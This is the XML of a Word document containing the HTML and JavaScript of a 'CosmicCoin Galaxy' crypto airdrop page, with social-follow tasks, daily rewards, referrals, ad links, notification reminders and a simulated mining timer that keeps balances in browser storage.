        </w:rPr>
        <w:t>==" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_cpo_ig')"&gt;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Follow CPO on Instagram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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://x.com/tosinsodiya1?t=dqzzaDkR4c-ZDb55Msit8g&amp;s=09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_cpo_x')"&gt;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Follow CPO on X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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://x.com/Vickydiya1?t=dqzzaDkR4c-ZDb55Msit8g&amp;s=09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_cao_ig')"&gt;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Follow CAO on X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&lt;/button&gt;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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://t.me/CosmicCoinGalaxy1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_cao_x')"&gt;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Join our community(TG)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&lt;div id="boosterSection" class="hidden"&gt;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&lt;h2 class="text-2xl mb-4"&gt;Boosters&lt;/h2&gt;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&lt;div class="rotating-circle"&gt;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&lt;div class="balance"&gt;0%&lt;/div&gt;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&lt;button class="task-button" onclick="activateBooster('speed')"&gt;Speed Booster&lt;/button&gt;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&lt;button class="task-button" onclick="activateBooster('efficiency')"&gt;Efficiency Booster&lt;/button&gt;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&lt;button class="task-button" onclick="activateBooster('yield')"&gt;Yield Booster&lt;/button&gt;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&lt;div id="squadsSection" class="hidden"&gt;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&lt;h2 class="text-2xl mb-4"&gt;Join Squads&lt;/h2&gt;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&lt;button class="task-button" onclick="joinSquad('CEO_CTO_CLAUNS')"&gt;Join CEO&amp;CTO CLAUNS (25B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CAO_HUBS')"&gt;Join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CAO HUBS (21B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CPO_VILLAGES')"&gt;Join CPO VILLAGES (19B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CMO_VILLAS')"&gt;Join CMO VILLAS (18B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CAO_CREWS')"&gt;Join CAO CREWS (10B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CPO_GUYS')"&gt;Join CPO GUYS (8.5B CosmicCoin)&lt;/button&gt;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&lt;button class="task-button" onclick="joinSquad('CMO_RESORTS')"&gt;Join CMO RESORTS (7.5B CosmicCoin)&lt;/button&gt;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&lt;/div&gt;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&lt;div id="rewardsSection" class="p-6 max-w-md mx-auto bg-gradient-to-r from-purple-800 to-black text-white rounded-lg shadow-lg mt-10"&gt;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&lt;h2 class="text-3xl font-bold text-center mb-6"&gt;🚀 Daily $Cos Rewards&lt;/h2&gt;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&lt;p class="text-lg text-center mb-4"&gt;Claim Your Daily Cosmic Loot and fuel your intergalactic adventures with $COS tokens!&lt;/p&gt;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&lt;!-- Claim Daily Reward Button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&lt;div class="flex justify-center mb-4"&gt;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&lt;button class="bg-yellow-400 hover:bg-yellow-600 text-black font-bold py-3 px-6 rounded-full transition duration-300 transform hover:scale-105"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onclick="claimDailyReward()"&gt;Claim Daily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Reward&lt;/button&gt;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&lt;!-- Double Reward Button (Watch Ads)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&lt;div class="flex justify-center"&gt;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&lt;button class="bg-green-500 hover:bg-green-700 text-white font-bold py-3 px-6 rounded-full transition duration-300 transform hover:scale-105"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onclick="window.open('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.cpmrevenuegate.com/k9x5gnvg?key=aa658a45eee053af4a31f6853b94c782</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>', '_blank'); doubleRewards()"&gt;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Get 2x coins and watch Ads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&lt;div id="referralSection" class="hidden"&gt;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&lt;h2 class="text-2xl mb-4"&gt;Referral Program&lt;/h2&gt;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&lt;p&gt;Invite friends to earn more CosmicCoin!&lt;/p&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://mirak-oracle.github.io/InviteFriend.COS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>/" target="_blank" class="bg-purple-500 hover:bg-purple-700 text-white font-bold py-2 px-4 rounded-full inline-block"&gt;Invite a Friend&lt;/a&gt;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&lt;p id="inviteStatus" class="mt-2"&gt;&lt;/p&gt;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&lt;/div&gt;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		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&lt;div id="notificationsSection" class="hidden"&gt;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&lt;h2 class="text-2xl mb-4"&gt;Enable Notifications&lt;/h2&gt;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&lt;button class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4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rounded-full" onclick="enableNotifications()"&gt;Enable Notifications&lt;/button&gt;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&lt;div id="comingSoonSection" class="hidden"&gt;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&lt;h2 class="text-2xl mb-4"&gt;Wallet&lt;/h2&gt;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&lt;p&gt;Coming soon...&lt;/p&gt;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&lt;div class="fixed bottom-0 left-0 right-0 bg-gray-800 text-white p-4"&gt;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&lt;div class="flex justify-around"&gt;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&lt;button class="nav-button" onclick="showSection('mainSection')"&gt;Home&lt;/button&gt;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&lt;button class="nav-button" onclick="showSection('tasksSection')"&gt;Tasks&lt;/button&gt;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&lt;button class="nav-button text-lg"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onclick="showSection('rewardsSection')"&gt;Rewards&lt;/button&gt;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&lt;button class="nav-button text-lg" onclick="showSection('referralSection')"&gt;Referral&lt;/button&gt;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&lt;button class="nav-button text-lg" onclick="showSection('notificationsSection')"&gt;Alert&lt;/button&gt;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&lt;button class="nav-button text-lg" onclick="showSection('comingSoonSection')"&gt;💰&lt;/button&gt;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&lt;button class="task-button mb-4" onclick="showSection('squadsSection')"&gt;Squads&lt;/button&gt;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&lt;script&gt;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function loadTawkTo()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var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();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var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];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s1.async=true;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s1.src='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://embed.tawk.to/66998eeebecc2fed69275083/1i33tclbi';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s1.charset='UTF-8';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s1.setAttribute('crossorigin','*');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s0.parentNode.insertBefore(s1,s0);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&lt;/script&gt;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&lt;!-- Google Form Modal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&lt;div class="modal-overlay" onclick="toggleModal()"&gt;&lt;/div&gt;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&lt;div id="googleFormModal" class="modal w-96"&gt;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&lt;iframe src="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://docs.google.com/forms/d/e/1FAIpQLSf9y-cJSKZkCC82uTjB_nzHFggRWceY1csU5sAyAMZ8uUkFhw/viewform?embedded=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" width="100%" height="100%" frameborder="0" marginheight="0" marginwidth="0"&gt;Loading...&lt;/iframe&gt;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&lt;script&gt;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function openModal()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document.getElementById('modalOverlay').style.display = 'block';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document.getElementById('googleFormModal').style.display = 'block';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document.getElementById('googleFormIframe').src = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://docs.google.com/forms/d/e/1FAIpQLSf9y-cJSKZkCC82uTjB_nzHFggRWceY1csU5sAyAMZ8uUkFhw/viewform?embedded=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>";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function closeModal()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document.getElementById('modalOverlay').style.display = 'none';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document.getElementById('googleFormModal').style.display = 'none';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document.getElementById('googleFormIframe').src = "";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&lt;/script&gt;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&lt;script&gt;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document.addEventListener("DOMContentLoaded", function()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setTimeout(function()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document.getElementById('loadingScreen').style.display = 'none';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}, 2000);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loadBalance();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loadMiningStatus();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function startMining(hours)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const isMining = localStorage.getItem('isMining');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const miningEndTime =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localStorage.getItem('miningEndTime');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const currentTime = new Date().getTime();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if (isMining === 'true' &amp;&amp; currentTime &lt; miningEndTime)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// If mining is in progress, do not allow another mining session to start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alert('Mining is already in progress. Please wait until the current session is complete.');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return;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const endTime = currentTime + hours * 60 * 60 * 1000;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localStorage.setItem('miningEndTime', endTime);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localStorage.setItem('isMining', 'true');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updateMiningStatus();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function updateMiningStatus()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const miningEndTime = localStorage.getItem('miningEndTime');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const currentTime = new Date().getTime();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if (currentTime &lt; miningEndTime)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const timeLeft = (miningEndTime - currentTime) / 1000;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const hours = Math.floor(timeLeft / 3600);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const minutes = Math.floor((timeLeft % 3600) / 60);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const seconds = Math.floor(timeLeft % 60);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document.getElementById('miningStatus').innerText = `Mining in progress: ${hours}h ${minutes}m ${seconds}s left`;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updateMiningAmount((hours * 60 * 60) + (minutes * 60) + seconds);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setTimeout(updateMiningStatus, 1000);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 else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document.getElementById('miningStatus').innerText = 'Mining complete!';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const currentBalance = parseFloat(localStorage.getItem('balance')) ||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localStorage.setItem('balance', currentBalance + 10); // Adjust the reward as necessary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localStorage.setItem('isMining', 'false');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updateBalanceDisplay();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sendReminder();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function updateMiningAmount(secondsLeft)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const ratePerSecond = 0.00040; // Adjust mining rate per second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const currentBalance = parseFloat(localStorage.getItem('balance')) ||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const miningAmount = currentBalance + (ratePerSecond * (60 * 60 * 24 - secondsLeft)); // Total mined amount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document.getElementById('miningAmount').innerText = `Current Balance: ${miningAmount.toFixed(4)} COS`;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function updateBalanceDisplay()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const balance = localStorage.getItem('balance') || '0';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document.getElementById('miningAmount'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).innerText = `Current Balance: ${balance} COS`;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function loadBalance()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const balance = localStorage.getItem('balance') || '0';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document.getElementById('miningAmount').innerText = `Current Balance: ${balance} COS`;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function loadMiningStatus()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const isMining = localStorage.getItem('isMining') === 'true';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if (isMining)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updateMiningStatus();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} else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document.getElementById('miningStatus').i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nnerText = 'No mining in progress';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function showSection(sectionId)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const sections = ['mainSection', 'tasksSection', 'rewardsSection', 'referralSection', 'notificationsSection', 'comingSoonSection', 'boosterSection', 'squadsSection'];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sections.forEach(id =&gt; document.getElementById(id).classList.add('hidden'));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document.getElementById(sectionId).classList.remove('hidden');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function claimDailyReward()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const lastClaimTime = localStorage.getItem('lastClaimTime');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const currentTime = new Date().getTime();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const oneDay = 24 * 60 * 60 * 1000; // 24 hours in milliseconds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// Check if the user has already claimed the reward within the last 24 hours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if (lastClaimTime &amp;&amp; currentTime - lastClaimTime &lt; oneDay)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alert('You have already claimed your daily reward </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>today</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t xml:space="preserve">. Come back </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>tomorrow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>!');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 else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// If the user hasn't claimed within the last 24 hours, allow the claim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alert('Daily reward claimed!');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const currentBalance =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parseFloat(localStorage.getItem('balance')) ||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localStorage.setItem('balance', currentBalance + 50); // Add daily reward amount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localStorage.setItem('lastClaimTime', currentTime);   // Store the time of the claim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updateBalanceDisplay();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// Function to update balance display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function updateBalanceDisplay()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const balance = localStorage.getItem('balance') ||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document.getElementById('balanceDisplay').textContent = `Balance: ${balance} $COSMIC`;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// Function to complete tasks and check if already completed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function completeTask(taskId)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const completedTasks = JSON.parse(localStorage.getItem('completedTasks')) || {};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if (completedTasks[taskId])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alert('Task already completed! More tasks coming soon 😊');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// Optionally, display a meme or image here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document.getElementById('taskMeme').innerHTML = '&lt;img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src="path_to_your_meme.jpg" alt="Meme" /&gt;';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 else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alert(`Task ${taskId} completed!`);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const currentBalance = parseFloat(localStorage.getItem('balance')) ||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localStorage.setItem('balance', currentBalance + 80); // Reward for task completion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completedTasks[taskId] = true;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localStorage.setItem('completedTasks', JSON.stringify(completedTasks));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updateBalanceDisplay();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function generateReferralCode() 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return Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15);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function inviteFriend()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const referralCode = generateReferralCode();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const referralLink = `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://t.me/CosmicCoinGalaxyAirdrop_Bot?start=ar0978585297?ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>=${referralCode}`;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const shareText = 'Join me in earning CosmicCoin through the CosmicCoin Galaxy Airdrop. Use my referral link to get started!';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const shareTitle = 'Join the CosmicCoin Galaxy Airdrop!';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// Try Web Share API first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if (navigator.share)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navigator.share({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title: shareTitle,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text: shareText,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url: referralLink,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.then(() =&gt; console.log('Successful share'))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.catch((error) =&gt;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console.log('Error sharing', error);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fallbackShare();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 else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fallbackShare();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function fallbackShare()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const shareOptions = document.createElement('div');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shareOptions.className = 'fixed inset-0 bg-gray-600 bg-opacity-50 overflow-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y-auto h-full w-full flex items-center justify-center';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shareOptions.innerHTML = `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&lt;div class="bg-white p-8 rounded-md shadow-xl max-w-md w-full"&gt;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&lt;h2 class="text-xl font-bold mb-4"&gt;Share Referral Link&lt;/h2&gt;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&lt;p class="mb-4"&gt;Choose how you want to share your referral link:&lt;/p&gt;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&lt;div class="space-y-4"&gt;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&lt;button onclick="copyToClipboard('${referralLink}')" class="w-full px-4 py-2 bg-blue-500 text-white rounded hover:bg-blue-600"&gt;Copy Link&lt;/button&gt;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&lt;a href="mailto:?subject=${encodeURIComponent(shareTitle)}&amp;body=${encodeURIComponent(shareText + ' ' + referralLink)}" class="block w-full px-4 py-2 bg-green-500 text-white rounded hover:bg-green-600 text-center"&gt;Share via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Email&lt;/a&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://twitter.com/intent/tweet?text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>=${encodeURIComponent(shareText + ' ' + referralLink)}" target="_blank" rel="noopener noreferrer" class="block w-full px-4 py-2 bg-blue-400 text-white rounded hover:bg-blue-500 text-center"&gt;Share on Twitter&lt;/a&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.facebook.com/sharer/sharer.php?u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>=${encodeURIComponent(referralLink)}" target="_blank" rel="noopener noreferrer" class="block w-full px-4 py-2 bg-blue-600 text-white rounded hover:bg-blue-700 text-center"&gt;Share on Facebook&lt;/a&gt;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&lt;button onclick="closeShareOptions()" class="w-full px-4 py-2 bg-gray-300 text-gray-800 rounded hover:bg-gray-400"&gt;Close&lt;/button&gt;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`;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document.body.appendChild(shareOptions);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function copyToClipboard(text)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navigator.clipboard.writeText(text).then(() =&gt;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alert('Referral link copied to clipboard!');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}, (err) =&gt;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console.error('Could not copy text: ', err);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function closeShareOptions()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const shareOptions = document.querySelector('.fixed');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if (shareOptions)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shareOptions.remove();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function generateReferralCode()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// Generate a simple and professional referral code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const timestamp = Date.now().toString(36); // Convert current timestamp to a base-36 string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const randomPart = Math.random().toString(36).substring(2, 8).toUpperCase(); // Generate a random string and convert to uppercase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return `${timestamp}-${randomPart}`;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function updateBalanceDisplay()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const balance = localStorage.getItem('balance') || '0';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document.getElementById('miningAmount').innerText = `Current Balance: ${balance} CosmicCoin`;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function rewardReferrer(referralCode)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// Assuming referralCode can be used to identify the referrer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const referrerBalanceKey = `balance_${referralCode}`;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const currentBalance = parseFloat(localStorage.getItem(referrerBalanceKey)) ||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const newBalance = currentBalance + 30; // Reward amount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localStorage.setItem(referrerBalanceKey,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newBalance);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console.log(`Referrer with code ${referralCode} now has a balance of ${newBalance} CosmicCoin`);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function rewardNewUser()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const currentUserBalance = parseFloat(localStorage.getItem('balance')) ||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const newBalance = currentUserBalance + 20; // Reward for using referral code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localStorage.setItem('balance', newBalance);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function checkReferral()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const urlParams = new URLSearchParams(window.location.search);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const referralCode = urlParams.get('ref');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if (referralCode)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rewardReferrer(referralCode);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rewardNewUser();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updateBalanceDisplay();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alert(`You've been rewarded for using a referral code! Your current balance is ${localStorage.getItem('balance')} CosmicCoin.`);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document.addEventListener("DOMContentLoaded", function()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updateBalanceDisplay();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checkReferral();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function activateBooster(booster) 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alert(`${booster.charAt(0).toUpperCase() + booster.slice(1)} Booster activated!`);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document.querySelector('.balance').textContent = '10%';  // Placeholder for actual logic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let userCoins = parseFloat(localStorage.getItem('userCoins')) || 0;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function joinSquad(squad)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const rewards =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'CEO_CTO_CLAUNS': 5000,  //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'CAO_HUBS': 2100,        //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'CPO_VILLAGES': 1900,    //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'CMO_VILLAS': 1800,      //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'CAO_CREWS': 1009,       //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'CPO_GUYS': 950,       //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'CMO_RESORTS': 850     //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};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let userCoins = parseFloat(localStorage.getItem('userCoins')) ||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let joinedSquads = JSON.parse(localStorage.getItem('joinedSquads')) || {};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if (joinedSquads[squad])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alert(`You've already joined ${squad.replace(/_/g, ' ')}! No additional rewards.`);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return;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let reward = rewards[squad] ||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userCoins += reward;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localStorage.setItem('userCoins', userCoins);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alert(`Joined ${squad.replace(/_/g, ' ')}! Reward: ${reward.toLocaleString()} CosmicCoins. Total: ${userCoins.toLocaleString()} CosmicCoins.`);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const maxReward = Math.max(...Object.values(rewards));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if (reward === maxReward)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alert('Congratulations! You joined the squad with the highest CosmicCoin amount. Extra reward granted!');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userCoins += 100;  // Extra reward for joining the highest squad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localStorage.setItem('userCoins', userCoins);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joinedSquads[squad] = true;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localStorage.setItem('joinedSquads', JSON.stringify(joinedSquads));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updateBalanceDisplay();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function updateBalanceDisplay()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const balance = localStorage.getItem('userCoins') || '0';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document.getElementById('miningAmount').innerText = `Current Balance: ${parseFloat(balance).toLocaleString()} CosmicCoin`;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window.addEventListener('load', function()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setTimeout(() =&gt;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document.getElementById('loadingScreen').style.display = 'none';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}, 3000);  // Simulates a 3-second loading screen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// Function to enable notifications and set a mining reminder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function enableNotifications()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if ("Notification" in window)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// Check if the browser supports notifications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if (Notification.permission === "granted")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alert('Notifications are already enabled!');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setMiningReminder(); // Set the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mining reminder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 else if (Notification.permission !== "denied")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// Request permission from the user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Notification.requestPermission().then(function (permission)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if (permission === "granted")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alert('Notifications enabled!');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setMiningReminder(); // Set the mining reminder after enabling notifications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} else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alert('Notifications disabled. Please enable notifications in your browser settings.');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 else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alert('You have denied notifications. Please change your settings to enable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notifications.');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 else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alert('This browser does not support notifications.');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// Function to set a mining reminder after a specified interval (12/24 hours)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function setMiningReminder()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const twelveHours = 12 * 60 * 60 * 1000; // 12 hours in milliseconds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const twentyFourHours = 24 * 60 * 60 * 1000; // 24 hours in milliseconds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// Schedule the notification to appear every 12 hours (can be changed to 24 hours)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setTimeout(function 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showMiningNotification(); // Call the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function to display notification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// You can recursively call the function if you want continuous reminders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setMiningReminder(); // Continue the reminder loop for the next 12/24 hours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}, twelveHours); // Change this to `twentyFourHours` for a 24-hour reminder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// Function to show the mining notification in the notifications bar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function showMiningNotification()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if (Notification.permission === "granted")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const options =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body: "⛏️ Time to continue mining your CosmicCoin! Click to return to the mining page.",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icon: "path_to_mining_icon.png", // Path to an icon (optional)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vibrate: [200, 100, 200], // Vibration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pattern for mobile devices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requireInteraction: true // Keeps the notification visible until the user interacts with it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const notification = new Notification('🚀 Mining Reminder', options);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// Add a click event to the notification that brings the user back to the mining page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notification.onclick = function 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window.focus(); // Brings the mining tab into focus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window.location.href = "your_mining_page_url"; // Replace with your actual mining page URL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// Manually trigger the reminder at page load (e.g., when mining starts)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function startMiningProcess()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enableNotifications(); // Ask for notification permission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setMiningReminder();   // Set a 12/24-hour reminder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	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&lt;/script&gt;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&lt;/html&gt;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2024-09-24T15:13:56Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>